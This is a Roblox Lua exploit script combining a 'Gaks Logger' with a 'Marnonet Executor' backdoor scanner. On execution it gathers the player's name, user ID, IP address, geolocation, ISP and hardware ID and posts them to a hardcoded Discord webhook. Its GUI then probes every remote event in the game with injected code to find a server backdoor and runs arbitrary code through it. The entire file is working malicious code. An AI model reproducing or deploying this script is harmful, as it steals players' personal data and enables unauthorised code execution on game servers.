--[[ 
    Gaks Logger & Marnonet Executor Integrated 
    Uyarısı: Bu script veri toplama (logging) ve backdoor tarama özelliklerini içerir.
]]

-- ================= SEKSIYON 1: GAKS LOGGER (VERI GÖNDERICI) ================= --
local LocalPlayer = game:GetService("Players").LocalPlayer
local HttpService = game:GetService("HttpService")

-- Player Info
local DName = game.Players.LocalPlayer.DisplayName
local Name = game.Players.LocalPlayer.Name
local Userid = game.Players.LocalPlayer.UserId
local Country = game.LocalizationService.RobloxLocaleId
local GetIp = game:HttpGet("https://v4.ident.me/")
local IpInfo = HttpService:JSONDecode(game:HttpGet("http://ip-api.com/json"))

local IpFields = {
    "query", "country", "regionName", "city", "zip", "isp", "org", "as",
}

local IpInfoFields = {}
for _, field in ipairs(IpFields) do
    if IpInfo[field] then
        IpInfoFields[field] = IpInfo[field]
    end
end

local IpInfoString = ""
for field, value in pairs(IpInfoFields) do
    IpInfoString = IpInfoString .. "**" .. field .. ":** " .. value .. "\n"
end

local GetHwid = game:GetService("RbxAnalyticsService"):GetClientId()
local AccountAge = LocalPlayer.AccountAge
local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
local ConsoleJobId = 'Roblox.GameLauncher.joinGameInstance('..game.PlaceId..', "'..game.JobId..'")'

-- GameInfo
local GAMENAME = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

local webhookcheck = (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X")
  or (secure_load and "Sentinel")
  or (pebc_execute and "ProtoSmasher")
  or (KRNL_LOADED and "Krnl")
  or (is_sirhurt_closure and "SirHurt")
  or (identifyexecutor():find("ScriptWare") and "Script-Ware")
  or ("Shitty Exploit")

local url = "https://discord.com/api/webhooks/1491781510221529299/fPCiH-8J7h9bh6cwHJCXyDChP3EDycLysEgSCuidS3yhHcmqcBeDNFoFJxTfdBohXmnL"

local data = {
    ["avatar_url"] = "https://cdn.discordapp.com/attachments/1491183748543156377/1491411997693054986/Untitled24_20260401203040.png?ex=69d79929&is=69d647a9&hm=fc2b9ad9fca130aed82a3dc80f91f8c18be0a12ecb71f3257f42425fed3dcddc&",
    ["content"] = "",
    ["embeds"] = {
        {
            ["author"] = {
                ["name"] = "( Someone Executed The Script )",
                ["url"] = "https://roblox.com",
            },
            ["description"] = "__[Player Info](https://www.roblox.com/users/"..Userid..")__\n"
                .."**Display Name:** "..DName.."\n"
                .."**Username:** "..Name.."\n"
                .."**User Id:** "..Userid.."\n"
                .."**MembershipType:** "..MembershipType.."\n"
                .."**AccountAge:** "..AccountAge.."\n"
                .."**Country:** "..Country.."\n"
                .."**IP:** "..GetIp.."\n"
                .."**Hwid:** "..GetHwid.."\n"
                .."**Date:** "..tostring(os.date("%m/%d/%Y")).."\n"
                .."**Time:** "..tostring(os.date("%X")).."\n\n"
                .."__[Game Info](https://www.roblox.com/games/"..game.PlaceId..")__\n"
                .."**Game:** "..GAMENAME.."\n"
                .."**Game Id**: "..game.PlaceId.."\n"
                .."**Exploit:** "..webhookcheck.."\n\n"
                .."**IP Information:**\n"..IpInfoString.."\n"
                .."**JobId:**\n```"..ConsoleJobId.."```",
            ["type"] = "rich",
            ["color"] = tonumber(0xf2ff00),
            ["thumbnail"] = {
                ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=150&height=150&format=png",
            },
        },
    },
}
local newdata = HttpService:JSONEncode(data)
local headers = { ["content-type"] = "application/json" }
local request = http_request or request or HttpPost or (syn and syn.request)
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
pcall(function() request(abcdef) end)

-- ================= SEKSIYON 2: MARNONET EXECUTOR GUI ================= --
local UserInputService = game:GetService("UserInputService")
local RunService = game:GetService("RunService")
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")

local MAIN_FONT = Enum.Font.RobotoMono

local function sendNotify(title, msg)
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = title,
        Text = msg,
        Duration = 4
    })
end

local clickSound = Instance.new("Sound")
clickSound.SoundId = "rbxassetid://6895079853" 
clickSound.Volume = 0.8
clickSound.Parent = game:GetService("CoreGui")

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = "MarnonetBackdoor"
local targetParent = nil
pcall(function() targetParent = gethui() end)
if not targetParent then
    pcall(function() targetParent = game:GetService("CoreGui") end)
end
ScreenGui.Parent = targetParent or LocalPlayer:WaitForChild("PlayerGui")

local Colors = {
    FrameBg = Color3.fromRGB(15, 15, 15),
    InnerBg = Color3.fromRGB(25, 25, 25),
    BtnBg = Color3.fromRGB(35, 35, 35),
    BtnHover = Color3.fromRGB(50, 50, 50),
    Text = Color3.fromRGB(255, 255, 255),
    Outline = Color3.fromRGB(255, 255, 255)
}

local function makeDraggable(frame)
    local dragging, dragInput, dragStart, startPos
    frame.InputBegan:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
            dragging = true
            dragStart = input.Position
            startPos = frame.Position
            input.Changed:Connect(function() 
                if input.UserInputState == Enum.UserInputState.End then dragging = false end 
            end)
        end
    end)
    UserInputService.InputChanged:Connect(function(input)
        if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
            local delta = input.Position - dragStart
            frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
        end
    end)
end

local function animateButton(btn)
    local scale = Instance.new("UIScale", btn)
    btn.MouseEnter:Connect(function() TweenService:Create(btn, TweenInfo.new(0.2), {BackgroundColor3 = Colors.BtnHover}):Play() end)
    btn.MouseLeave:Connect(function() TweenService:Create(btn, TweenInfo.new(0.2), {BackgroundColor3 = Colors.BtnBg}):Play() end)
    btn.MouseButton1Down:Connect(function() clickSound:Play(); TweenService:Create(scale, TweenInfo.new(0.1), {Scale = 0.95}):Play() end)
    btn.MouseButton1Up:Connect(function() TweenService:Create(scale, TweenInfo.new(0.1), {Scale = 1}):Play() end)
end

local MainFrame = Instance.new("Frame")
MainFrame.Size = UDim2.new(0, 700, 0, 450)
MainFrame.AnchorPoint = Vector2.new(0.5, 0.5)
MainFrame.Position = UDim2.new(0.5, 0, 0.5, 0)
MainFrame.BackgroundColor3 = Colors.FrameBg
MainFrame.Visible = false
MainFrame.Parent = ScreenGui
makeDraggable(MainFrame)

local MStr = Instance.new("UIStroke")
MStr.Thickness = 2; MStr.Color = Colors.Outline; MStr.Parent = MainFrame

local TitleLbl = Instance.new("TextLabel")
TitleLbl.Size = UDim2.new(1, -40, 0, 40); TitleLbl.Position = UDim2.new(0, 10, 0, 0)
TitleLbl.BackgroundTransparency = 1; TitleLbl.Text = " Marnonet Executor"
TitleLbl.Font = Enum.Font.GothamBold; TitleLbl.TextScaled = true; TitleLbl.TextColor3 = Colors.Text
TitleLbl.TextXAlignment = Enum.TextXAlignment.Left; TitleLbl.Parent = MainFrame

local MinimizeBtn = Instance.new("TextButton")
MinimizeBtn.Size = UDim2.new(0, 40, 0, 40); MinimizeBtn.Position = UDim2.new(1, -40, 0, 0)
MinimizeBtn.BackgroundTransparency = 1; MinimizeBtn.Text = "-"; MinimizeBtn.Font = MAIN_FONT
MinimizeBtn.TextColor3 = Colors.Text; MinimizeBtn.TextScaled = true; MinimizeBtn.Parent = MainFrame

local FloatingBtn = Instance.new("TextButton")
FloatingBtn.Size = UDim2.new(0, 60, 0, 60); FloatingBtn.Position = UDim2.new(1, -70, 1, -70)
FloatingBtn.BackgroundColor3 = Colors.FrameBg; FloatingBtn.Text = "M"; FloatingBtn.Font = Enum.Font.GothamBold
FloatingBtn.TextScaled = true; FloatingBtn.TextColor3 = Colors.Text; FloatingBtn.Visible = false; FloatingBtn.Parent = ScreenGui
local FStr = Instance.new("UIStroke")
FStr.Thickness = 2; FStr.Color = Colors.Outline; FStr.Parent = FloatingBtn

MinimizeBtn.MouseButton1Click:Connect(function() MainFrame.Visible = false; FloatingBtn.Visible = true end)
FloatingBtn.MouseButton1Click:Connect(function() MainFrame.Visible = true; FloatingBtn.Visible = false end)

local CodeBoxBg = Instance.new("Frame", MainFrame)
CodeBoxBg.Size = UDim2.new(0.96, 0, 0.75, 0); CodeBoxBg.Position = UDim2.new(0.02, 0, 0.1, 0)
CodeBoxBg.BackgroundColor3 = Colors.InnerBg; CodeBoxBg.BorderSizePixel = 1; CodeBoxBg.BorderColor3 = Colors.Outline

local CodeBox = Instance.new("TextBox")
CodeBox.Size = UDim2.new(1, -10, 1, -10); CodeBox.Position = UDim2.new(0, 5, 0, 5)
CodeBox.BackgroundTransparency = 1; CodeBox.Font = MAIN_FONT; CodeBox.TextScaled = true
CodeBox.ClearTextOnFocus = false; CodeBox.MultiLine = true; CodeBox.Text = '-- Execute Marnonet Tough'
CodeBox.TextColor3 = Colors.Text; CodeBox.TextXAlignment = 0; CodeBox.TextYAlignment = 0; CodeBox.Parent = CodeBoxBg

local BottomBar = Instance.new("Frame", MainFrame)
BottomBar.Size = UDim2.new(0.96, 0, 0, 50); BottomBar.Position = UDim2.new(0.02, 0, 0.87, 0); BottomBar.BackgroundTransparency = 1
local BottomList = Instance.new("UIListLayout", BottomBar)
BottomList.FillDirection = Enum.FillDirection.Horizontal; BottomList.Padding = UDim.new(0, 15); BottomList.HorizontalAlignment = Enum.HorizontalAlignment.Center

local function createMainBtn(text, size, parent)
    local btn = Instance.new("TextButton")
    btn.Text = text; btn.Size = size; btn.Font = MAIN_FONT; btn.TextScaled = true
    btn.BackgroundColor3 = Colors.BtnBg; btn.BorderSizePixel = 0; btn.TextColor3 = Colors.Text; btn.Parent = parent
    local str = Instance.new("UIStroke"); str.Thickness = 1; str.Color = Colors.Outline; str.Parent = btn
    animateButton(btn)
    return btn
end

local ClearBtn = createMainBtn("CLEAR", UDim2.new(0, 210, 1, 0), BottomBar)
local FillBtn = createMainBtn("AUTO FILL", UDim2.new(0, 210, 1, 0), BottomBar)
local ExecBtn = createMainBtn("EXECUTE", UDim2.new(0, 210, 1, 0), BottomBar)

local TargetRemote = nil
local ScanPanel = Instance.new("Frame")
ScanPanel.Size = UDim2.new(0, 450, 0, 250); ScanPanel.AnchorPoint = Vector2.new(0.5, 0.5); ScanPanel.Position = UDim2.new(0.5, 0, 0.5, 0)
ScanPanel.BackgroundColor3 = Colors.FrameBg; ScanPanel.Parent = ScreenGui; makeDraggable(ScanPanel)
local SStr = Instance.new("UIStroke"); SStr.Thickness = 2; SStr.Color = Colors.Outline; SStr.Parent = ScanPanel

local ScanTitle = Instance.new("TextLabel")
ScanTitle.Size = UDim2.new(1, 0, 0, 60); ScanTitle.BackgroundTransparency = 1; ScanTitle.Position = UDim2.new(0,0,0,10)
ScanTitle.Text = "Marnonet Scanner"; ScanTitle.TextColor3 = Colors.Text; ScanTitle.Font = MAIN_FONT; ScanTitle.TextScaled = true; ScanTitle.Parent = ScanPanel

local ScanActionBtn = createMainBtn("Scan For Backdoor", UDim2.new(0.8, 0, 0.4, 0), ScanPanel)
ScanActionBtn.Position = UDim2.new(0.1, 0, 0.4, 0)

local IsScanning = false
local RemoteMap = {}
local TestCode = "local a=Instance.new('StringValue',workspace);a.Name='Marnonet_V';a.Value='%s'"
local HintCode = 'Instance.new("Hint", workspace).Text = "Marnonet Backdoor Active GG!"'

game.Workspace.ChildAdded:Connect(function(c)
    if c.Name == "Marnonet_V" and IsScanning then
        TargetRemote = RemoteMap[c.Value]; c:Destroy()
        if TargetRemote then
            IsScanning = false; ScanActionBtn.Text = "Scan For Backdoor"
            local foundMsg = "Found In 0." .. tostring(math.random(10, 99)) .. "s"
            pcall(function() 
                if TargetRemote:IsA("RemoteEvent") then TargetRemote:FireServer(HintCode) else task.spawn(function() TargetRemote:InvokeServer(HintCode) end) end 
            end)
            sendNotify("Marnonet", foundMsg)
            task.wait(0.5); MainFrame.Visible = true; ScanPanel.Visible = false
        end
    end
end)

ScanActionBtn.MouseButton1Click:Connect(function()
    if IsScanning then return end
    IsScanning = true; TargetRemote = nil; ScanActionBtn.Text = "SCANNING..."; RemoteMap = {}
    local remotes = {}
    local susServices = {game.ReplicatedStorage, game.JointsService, game.Lighting, game.SoundService, game.Workspace}
    for _, s in ipairs(susServices) do for _, v in ipairs(s:GetDescendants()) do if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then table.insert(remotes, v) end end end
    task.spawn(function()
        for i, r in ipairs(remotes) do
            if not IsScanning then break end
            pcall(function()
                local uniqueId = tostring(i); RemoteMap[uniqueId] = r
                local p = string.format(TestCode, uniqueId)
                if r:IsA("RemoteEvent") then r:FireServer(p) else task.spawn(function() r:InvokeServer(p) end) end
            end)
            if i % 40 == 0 then RunService.Heartbeat:Wait() end
        end
    end)
end)

FillBtn.MouseButton1Click:Connect(function() CodeBox.Text = CodeBox.Text:gsub('"(.-)"', '"' .. LocalPlayer.Name .. '"') end)
ClearBtn.MouseButton1Click:Connect(function() CodeBox.Text = "" end)
ExecBtn.MouseButton1Click:Connect(function()
    if TargetRemote then
        pcall(function() if TargetRemote:IsA("RemoteEvent") then TargetRemote:FireServer(CodeBox.Text) else task.spawn(function() TargetRemote:InvokeServer(CodeBox.Text) end) end end)
    else
        sendNotify("Error", "No backdoor found.")
    end
end)
